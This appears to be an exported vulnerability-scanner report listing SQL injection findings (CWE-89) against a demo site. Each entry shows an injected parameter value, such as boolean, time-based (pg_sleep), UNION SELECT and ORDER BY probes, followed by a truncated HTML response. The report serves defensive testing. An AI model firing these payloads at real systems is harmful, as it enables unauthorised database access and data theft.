href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1311\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1312\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1313\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,3,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1314Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1 UNION SELECT 1 INTO @,\n@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1315\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1316\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1317\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1' ORDER BY 2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1318\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1319\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1320\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1321\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,1,1))='M'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1322\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2,3\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1323\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1324\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1325\nScan SQL Injection\nSeverity ERROR\nEndpoint 